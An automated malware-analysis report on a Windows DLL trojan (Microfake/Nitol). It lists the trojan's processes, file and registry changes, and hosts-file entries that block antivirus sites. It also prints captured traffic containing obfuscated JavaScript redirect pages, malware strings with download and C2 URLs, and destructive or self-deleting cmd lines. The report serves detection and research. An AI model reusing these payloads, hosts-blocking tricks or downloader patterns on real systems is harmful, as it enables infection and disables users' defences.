Trojan.Microfake.D_2536732094

by malwarelabrobot on November 18th, 2014 in Malware Descriptions.

Trojan.Win32.MicroFake.ba (Kaspersky), Trojan.Microfake.D (B) (Emsisoft), Trojan.Microfake.D (AdAware), DDoS.Win32.Nitol.FD, mzpefinder_pcap_file.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 2536732094c2c9599eda58d7feb40ffa
SHA1: 6bbd5e533f155313736b6b5532933fa01ffce621
SHA256: dc61adbc3391193e93e2f215a8940f68def389b4da6c40db4ba4029e6b1a6f1c
SSDeep: 768:JojY9PKLeWmM1gJb9MCq5L4UZoayHJojY9P:8miLeW3iV9M7ToayH8m
Size: 45056 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-06-08 12:59:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736

The Trojan injects its code into the following process(es):

QQExtrenal.exe:3124
svchost.exe:592

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process QQExtrenal.exe:3124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\etc\hosts (898 bytes)

The process kmokq.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\皇者８０星王合击[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\耀辉传奇[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\王者网络[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\光明合击[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\王者网络[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\王者网络[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\光明合击[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\财神⑨星[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\财神⑨星[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\耀辉传奇[1].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\王者网络[1].htm (0 bytes)
%WinDir%\Temp\rbrkm.htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\王者网络[2].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\财神⑨星[1].rar (0 bytes)
%WinDir%\Temp\rqckm.htm (0 bytes)
%WinDir%\Temp\rbbkm.htm (0 bytes)

The process auiay.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\jarinet\QQExtrenal.exe (28 bytes)

The process regsvr32.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)

The process hrl1.tmp:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\eeeaea.exe (37 bytes)

Registry activity

The process taskkill.exe:2984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 08 D2 FB 94 FD AB 8F 98 AC 29 24 EC 26 BE 0D"

The process QQExtrenal.exe:3124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D0 14 E4 90 FF 3C 3D 7B 92 F8 24 71 E9 26 09"

The process kmokq.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 2F F6 14 EA 05 78 02 2B 52 48 36 B7 61 EF 55"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any other zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process auiay.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F9 8D B5 8A FE 0B 5E 5C 26 7F 38 09 54 84 34"

The process regsvr32.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 FF F2 9B 4E D6 40 84 48 CC 58 18 B0 C7 B1 92"

The process hrl1.tmp:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 D4 FF E2 C1 93 0F 10 63 F9 10 91 E3 8E AD 6E"

[HKLM\System\CurrentControlSet\Services\Nationalxwn]
"Description" = "Provideskdx a domain server for NI security."

Dropped PE files

MD5 File path
9df9a9eba8026ee00bde7291adf9e9f7 c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\139869[1].exe
9df9a9eba8026ee00bde7291adf9e9f7 c:\WINDOWS\Temp\kmokq.exe
0e95eca14e441eacc29fecce47be107e c:\WINDOWS\system32\eeeaea.exe

HOSTS file anomalies

The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses.
The modified file is 898 bytes in size. The following entries are added to the hosts file:

127.0.0.1 www.ijinshan.com
127.0.0.1 www.360.cn
127.0.0.1 www.rising.com.cn
127.0.0.1 www.ijinshan.com
127.0.0.1 kaba365.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2860 3072 3.84485 c9b6b9fbded3d4764666702b145428d1
.rdata 8192 2505 2560 3.36056 6951ee1a0ff3a7f5a44727b4713506a3
.data 12288 672 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 16384 37524 37888 4.14739 e57c1612c8a595a9ef275334498299d5
.reloc 57344 494 512 3.52939 cfa8d04dd000bb30ab126902176ed40d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
405e5da7e3d520ec6da9568f2703d7e5

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive

<<< skipped >>>

GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz

<<< skipped >>>

GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:25 GMT
Connection: keep-alive

<<< skipped >>>

GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   98
Pragma: no-cache
Cache-control: no-store

<<< skipped >>>

GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:26 GMT
Connection: keep-alive

<<< skipped >>>

GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   80
Pragma: no-cache
Cache-control: no-store


GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 766
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz

<<< skipped >>>

GET /.........rar?rhdkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   82
Pragma: no-cache
Cache-control: no-store

<<< skipped >>>

GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   85
Pragma: no-cache
Cache-control: no-store


GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz

<<< skipped >>>

GET /.........rar?rqckm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz


GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive

<<< skipped >>>

GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function wrzdkIW(dSgS){var d;var T;d="";for(var u=0;u<
;dSgS.length;u ){T=dSgS.charCodeAt(u)^86;d =String.fromCharCode(T^85)
;}return d;}function apeuzOV(){var rEdS = document.getElementById("jNe
M").value;var rExN=wlphoNK();window.location=wrzdkIW(rExN) rEdS;}funct
ion aipebBB(){var n="105,55,106,54,55";return eval("String.fromCharCod
e(" n ")");}function wlphoNK(){var n="44,60,112,112,101,116,104,102,12
2,62,122,58,105,58,55";return eval("String.fromCharCode(" n ")");}<
/script><html><br><br><br><center><
;h3><font color="#3C3C3C">..............:</font><fon
t color="blue"><script>var cUsF=aipebBB();document.write(wrzd
kIW(cUsF));</script> </font><input id="jNeM"> <
;input type=button value="................" onmouseup="apeuzOV()">&
lt;br><br></h3><center></html>HTTP/1.1 200
OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/htm
l; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires:
Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey
=actzmz..<script>function knhtiIU(kZaE){var y;var X;y="";for(var
o=0;o<kZaE.length;o ){X=kZaE.charCodeAt(o)^38;y =String.fromCharC
ode(X^37);}return y;}function wocbkUA(){var jZfO = document.getElement
ById("gFuI").value;var cDgG=rfhtsNF();window.location=knhtiIU(cDgG) jZ
fO;}function xvggoOQ(){var b="105,55,106,54,55";return eval("String.fr
omCharCode(" b ")");}function rfhtsNF(){var b="44,60,112,112,101,1

<<< skipped >>>

GET /.........rar?rbbkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 753
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function zrhbxSP(){var j="16,0,76,76,89,72,84,90,70,2,70
,6,85,6,11";return eval("String.fromCharCode(" j ")");}function ibgnwD
X(){var gWmA = document.getElementById("dLuC").value;var wBjA=zrhbxSP(
);window.location=cpwbpDX(wBjA) gWmA;}function cpwbpDX(dNsY){var z;var
Q;z="";for(var o=0;o<dNsY.length;o ){Q=dNsY.charCodeAt(o)^32;z =S
tring.fromCharCode(Q^31);}return z;}function adyufDW(){var j="85,11,86
,10,11";return eval("String.fromCharCode(" j ")");}</script><
html><br><br><br><center><h3><font
color="#3C3C3C">..............:</font><font color="blue"&
gt;<script>var gXoP=adyufDW();document.write(cpwbpDX(gXoP));<
/script> </font><input id="dLuC"> <input type=but
ton value="................" onmouseup="ibgnwDX()"><br><br
></h3><center></html>..


GET /.................rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.zz12320.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   82
Pragma: no-cache
Cache-control: no-store
<html><body><br><br><br><center>&l
t;h3><a href="#" onmouseup="ef(205)">..............</a>
</h3></center><script></script><script>v
ar gf="/................",hf="yqjs1",kf,if_=new Array(),jf;function ef
(ff){for(kf=0;kf<jf.length;kf )if_[kf]=jf.charCodeAt(kf);for(kf=49
;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252)&0xff))&0xff;}kf="
kf=4;while(true){if(kf>51)break;if_[kf]=(if_[kf]-if_[kf 1])&0xff;kf
;}";eval(kf);kf=51;while(kf>=2){if_[kf]=((((((if_[kf]-if_[kf-1])&
0xff)-142)&0xff)<<4)&0xff)|(((((if_[kf]-if_[kf-1])&0xff)-142)&0x
ff)>>4);kf--;}jf="";for(kf=1;kf<if_.length-1;kf )if(kf%7)jf
=String.fromCharCode(if_[kf]^ff);eval("kf=eval");kf(jf);}jf="=\xba\xbf
\xf7\xb57q\xe4\x9e$R8\x96L -\x07\x99\xf3\xea\x19\x90\xdc$\xf8\x98\xc1B
L\xb2\xd5\x81\xb5r\x27t<Pl\xb0<\x01\xbe\x1f\x98\xea\xd9\xe1u\x05
n\xa8\x9a";</script></body></html>HTTP/1.0 200 OK..C
ontent-Type: text/html..Content-Length: 827.Pragma: no-cache..Cache-
control: no-store..<html><body><br><br><br&
gt;<center><h3><a href="#" onmouseup="ef(205)">.....
.........</a></h3></center><script></script
><script>var gf="/................",hf="yqjs1",kf,if_=new Arr
ay(),jf;function ef(ff){for(kf=0;kf<jf.length;kf )if_[kf]=jf.charC
odeAt(kf);for(kf=49;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252
)&0xff))&0xff;}kf="kf=4;while(true){if(kf>51)break;if_[kf]=(if_

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

regsvr32.exe_1680:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

svchost.exe_592:

.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
%u.%u.%u.%u
hra%u.dll
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe

kmokq.exe_1948:

.text
`.rdata
@.data
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
WS2_32.dll
MSVCP60.dll
MSVCRT.dll
DeleteUrlCacheEntry
WININET.dll
URLDownloadToFileA
urlmon.dll
SHLWAPI.dll
hXXp://623968.6600.org:99/3.htm
201405131714
124.232.158.160
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
hXXp://
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
hXXp://VVV.sfy365.com/1.78
hXXp://VVV.yao933.com/
124.232.141.61

QQExtrenal.exe_3124:

.text
`.data
.rsrc
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
xxD.Downloader
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
VBA6.DLL
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Adodb.Stream
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
xxDown.exe

comine.exe_3324:

.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
kernel32.dll
NTDLL.DLL
shell32.dll
SHFileOperationA
ShellExecuteA
VBA6.DLL
1.vbp
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%
explorer.exe
WScript.Shell
Iexplore.exe
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
Hotkey
serv.dat

news4979.exe_3348:

.text
`.data
.rsrc
MSVBVM60.DLL
WebBrowser2
SHDocVwCtl.WebBrowser
WebBrowser1
vb6chs.dll
shdocvw.dll
